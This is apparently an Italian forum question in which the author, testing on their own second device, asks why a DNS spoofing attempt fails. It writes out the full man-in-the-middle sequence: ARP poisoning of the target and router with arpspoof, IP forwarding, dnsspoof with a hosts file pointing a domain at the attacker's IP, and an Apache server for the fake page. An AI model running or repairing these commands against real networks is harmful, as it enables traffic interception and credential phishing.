Ho provato a spoofare DNS
dnsspoof -i eth0 -f spoofhosts.txt
(all'interno di spoofhosts.txt c'è il mio (l'attaccante) ip locale e il dominio che voglio avvelenare)
e continuo a ricevere questo:
dnsspoof: listening on eth0 [udp dst port 53 and not src 10.0.0.11]
10.0.0.3.58451 > 10.0.0.138.53: 60823+ A? urlblablabla.com
Quando provo a entrare nell'URL in hosts.txt
dal mio altro dispositivo che ho attaccato, l'URL non può essere raggiunto.
Ho già seguito questi passaggi:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t //ATTACKED-IP// //Router//
arpspoof -i eth0 -t //Router// //ATTACKED-IP//
service apache2 start